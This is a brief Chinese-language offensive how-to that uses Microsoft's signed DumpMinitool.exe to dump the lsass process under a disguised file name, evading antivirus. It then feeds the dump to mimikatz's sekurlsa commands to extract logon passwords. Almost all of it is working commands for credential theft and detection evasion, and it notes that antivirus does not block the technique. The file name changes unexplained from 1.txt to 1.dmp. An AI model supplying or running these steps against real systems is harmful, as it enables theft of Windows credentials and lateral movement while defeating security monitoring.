微软签名DumpMinitool.exe,免杀dump hash
微软签名的exe
dump lsass进程
DumpMinitool.exe --file 1.txt --processId 948 --dumpType Full
--file 保存文件名为1.txt 规避一下杀软
--processId lsass.exe 进程号
杀软无拦截
查看1.dmp
sekurlsa::minidump "1.dmp"
sekurlsa::logonpasswords
参考文章:https://mp.weixin.qq.com/s/Q3XKEciDJggUqMHMc9Zdnw